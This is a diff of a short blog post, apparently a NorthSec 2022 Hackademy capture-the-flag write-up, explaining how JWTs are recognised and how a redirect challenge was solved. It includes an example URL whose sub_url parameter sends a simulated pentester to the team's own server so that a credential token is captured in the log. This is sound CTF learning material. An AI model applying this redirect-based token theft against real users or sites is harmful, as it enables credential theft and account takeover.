lolkatz/github-pages-with-jekyll/_posts/2022-05-28-northsec-hackademy.md

 ![JWT redirect](/will-hack-for-coffee/assets/images/nsec2022/jwt-redirect.png)

-You can use [jwt.io](jwt.io) to checkout what's inside the token and confirm it's a JWT but everytime I see the string "eyJ" I suspect a JWT.

-I found this challenge interesting, it was the first time I saw simple redirection used to steal credentials.
-Next link allows you to provide an URL and the "Grand master pentester" will visit it.
-Our team own a small server on the nsec network so I redirected him there: http://chal5.hackademy.ctf/?sub_url=http://shell.ctf Looking at our server log:
+You can use [jwt.io](jwt.io) to check what's inside a token and confirm it's a JWT.
+The next link on the website allows you to provide an URL and the "Grand master pentester" will visit it.
+Our team owned a small server on the nsec network so I redirected him there:

+http://chal5.hackademy.ctf/?sub_url=http://shell.ctf

+Looking at our server log:
 ````
 ...